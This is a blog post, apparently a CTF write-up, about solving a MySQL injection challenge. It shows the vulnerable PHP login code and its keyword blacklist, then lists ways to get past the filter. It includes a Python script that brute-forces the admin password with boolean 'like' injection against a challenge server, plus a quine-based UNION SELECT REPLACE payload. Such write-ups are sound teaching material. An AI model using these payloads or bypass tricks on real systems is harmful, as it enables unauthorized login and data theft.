[第五空间 2021]yet_another_mysql_injection
F12查看源代码发现 ?source提示,
<?php
include_once("lib.php");
function alertMes($mes,$url){
die("<script>alert('{$mes}');location.href='{$url}';</script>");
}
function checkSql($s) {
if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
alertMes('hacker', 'index.php');
}
}
if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
$username=$_POST['username'];
$password=$_POST['password'];
if ($username !== 'admin') {
alertMes('only admin can login', 'index.php');
}
checkSql($password);
$sql="SELECT password FROM users WHERE username='admin' and password='$password';";
$user_result=mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
alertMes("something wrong",'index.php');
}
if ($row['password'] === $password) {
die($FLAG);
} else {
alertMes("wrong password",'index.php');
}
}
if(isset($_GET['source'])){
show_source(__FILE__);
die;
}
?>
法一
checkSql()函数分析
sleep 可以用benchmark代替
<,> 可以用least(),greatest()代替
=,in 可以用like代替
substr 可以用mid代替
空格 可以用/**/代替
通过代码可以发现其实FLAG并不在数据库中,可以通过LIKE尝试爆破密码
脚本编写能力比较差,跟着WP写的
import requests
import time
char = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/*-+?~#!@&%'
def password():
flag = ''
url = 'http://1.14.71.254:28632/index.php'
while True:
for i in char:
payload = {"username": "admin", "password": f"1'or/**/password/**/like/**/'{flag + i}%'#"}
res = requests.post(url=url, data=payload)
time.sleep(0.1)
if "something wrong" not in res.text:
flag += i
print(flag)
break
if "NSSCTF" in res.text:
break
elif "~" in i:
return
if __name__ == '__main__':
password()
法二
在看WP时候发现了一种新玩法,因为最后比较结果一样就可以Bypass
参考的是这位大佬的博客,核心思想就是通过REPLACE替换套娃,让输入和输出结果一样,也就是构造
Quine程序
CTFHub_2021-第五空间智能安全大赛-Web-yet_another_mysql_injection(quine注入) - zhengna - 博客园 (cnblogs.com)
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
标签:__,replace,char,flag,2021,another,mysql,yet
From: https://www.cnblogs.com/0xo0Kerk/p/17204615.html